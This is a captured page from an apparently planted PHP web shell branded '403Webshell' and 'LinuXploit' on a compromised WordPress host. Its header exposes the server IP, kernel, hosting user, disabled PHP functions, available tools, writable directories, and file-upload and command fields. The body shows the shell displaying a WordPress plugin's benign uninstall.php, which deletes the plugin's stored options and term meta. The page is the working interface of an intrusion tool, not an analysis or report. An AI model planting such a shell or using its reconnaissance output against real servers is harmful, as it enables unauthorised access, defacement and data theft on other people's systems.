403Webshell
Server IP : 219.234.31.115  /  Your IP : 216.73.217.134
Web Server : Apache
System : Linux ebs-140924 5.10.0-30-amd64 #1 SMP Debian 5.10.218-1 (2024-06-01) x86_64
User : vndaystarftp ( 67432)
PHP Version : 7.3.33
Disable Function : link,symlink,passthru,exec,system,shell_exec,proc_open,popen,pcntl_exec,socket_bind,stream_socket_server,pcntl_fork,pcntl_rfork
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/wwwroot/vndaystarftp/wwwroot/wp-content/plugins/simple-taxonomy-ordering/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/wwwroot/vndaystarftp/wwwroot/wp-content/plugins/simple-taxonomy-ordering/uninstall.php
<?php
/**
 * Main Plugin Uninstall Handler.
 *
 * Cleanup Tasks:
 *  - Delete our 'yikes_simple_taxonomy_ordering_options' stored options
 *  - Delete all 'tax_position' term meta created by this plugin
 *
 * @package YIKES_Simple_Taxonomy_Ordering
 */

// If uninstall not called from WordPress, exit.
if ( ! defined( 'WP_UNINSTALL_PLUGIN' ) ) {
	exit;
}

// Delete the taxonomy ordering options.
delete_option( 'yikes_simple_taxonomy_ordering_options' );

// Delete `tax_position` term meta from the DB.
global $wpdb;
$wpdb->query( "DELETE FROM $wpdb->termmeta WHERE meta_key = 'tax_position'" );

Youez - 2016 - github.com/yon3zu
LinuXploit